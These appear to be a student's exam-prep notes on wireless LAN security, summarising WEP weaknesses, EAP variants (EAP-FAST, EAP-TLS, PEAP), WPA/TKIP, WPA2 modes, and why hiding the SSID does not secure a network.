Wired Equivalent Privacy (WEP)
Wired Equivalent Privacy (WEP) was the first implementation of wireless encryption, it has several weaknesses and should not be used. Weaknesses include:

Weak encryption that has been broken

Vulnerable to dictionary attacks

Client trusts AP allowing for a rogue access point

Keys must be manually distributed

802.1x Extensible Authentication Protocols (EAP)
EAP was originally developed for wired port access control and was adopted for wireless access control. The pieces for an EAP implementation require a client wireless card and supplicant, authentication server and access point that are all EAP capable. A wireless client can only transmit EAP traffic until it is authenticated, the RADIUS server authenticates the client and the client authenticates the server in a challenge and response. EAP was originally defined in RFC 2284, which was made obsolete by RFC 3748 and defined for wireless LANs in RFC 4017.

Mutual authentication of server and client by using the TLS handshake protocol

Immune to man in the middle attacks

Ability to use multiple password authentication backends

Computationally efficient

Does not require certificates

EAP-FAST consists of three phases:

Phase 0 — Client is dynamically provisioned with a Protected Access Credential (PAC) which can also be installed manually, so this phase is considered optional.

Phase 1 — Server and client use PAC to authenticate each other and establish a secure tunnel.

Phase 2 — Client sends credentials through tunnel for authentication.

Exensible Authentication Protocol – Transport Layer Security (EAP-TLS)
EAP-TLS was originally defined in RFC 2716 but was redefined by RFC 5216 in March of 2008, TLS enhancements were defined in RFC 4507. Uses public key infrastructure (PKI) meaning that both client and server need a certificate for authentication and the certificates must be issued by a certification authority (CA). Client is the supplicant, authenticator is the AP and the authentication server is the RADIUS server.

EAP-TLS Authentication Process:

Client associates to AP which restricts traffic to only EAP traffic.

AP requests identity which it then passes to the RADIUS server.

Client validates certificate and responds with EAP with it’s own certificate which starts cryptographic negotiations.

After the RADIUS server validates the client certificate it responds with the cryptographic specifications for the session.

Protected EAP (PEAP)
PEAP only requires the authentication server to have a certificate.

PEAP has two phases:

Phase 1 – The client authenticates the server using the CA to verify its certificate and an encrypted TLS tunnel is created with the client.

WPA
WPA with TKIP can now be broken in a minute. It is not recommended for use, however it is still on the test. WPA with TKIP encryption was developed as an interim standard, created to maintain backward compatibility with hardware that had supported WEP. WPA performs authentication using either 802.1x/EAP or with preshared keys prior to the key management phase. WPA uses Temporal Key Integrity Protocol (TKIP) and Message Integrity Check (MIC) and per-packet keying (PPK) in an attempt to make it more secure.

802.11i or WPA2
802.11i is known more commonly as WPA2 and refers to the approved implementation of members of the Wi-Fi Alliance. It provides stronger encryption, AES rather than the weaker RC4 used by WEP and WPA. As a result it commonly required a hardware upgrade.

Keys WPA2 facts from the ONT book:

Uses 802.1x for authentication

Uses similar method of key distribution and renewal as WPA

Supports Proactive Key Caching (PKC)

Has Intrusion Detection System (IDS)

WPA/WPA2 provide two modes of operation:

Personal mode — Authentication is performed using PSK

Enterprise mode — 802.1x/EAP and AAA/Radius server is used for authentication

I will end with this quote, I wish I could find the reference but it is probably from the ONT book:

Some people mistakenly think that if the AP is configured not to broadcast its SSID, they have a secure wireless LAN; that is not true. When a legitimate wireless client with the correct SSID attempts to associate with its AP, the SSID is exchanged over the air unencrypted; that means that an illegitimate user can easily capture and use the SSID.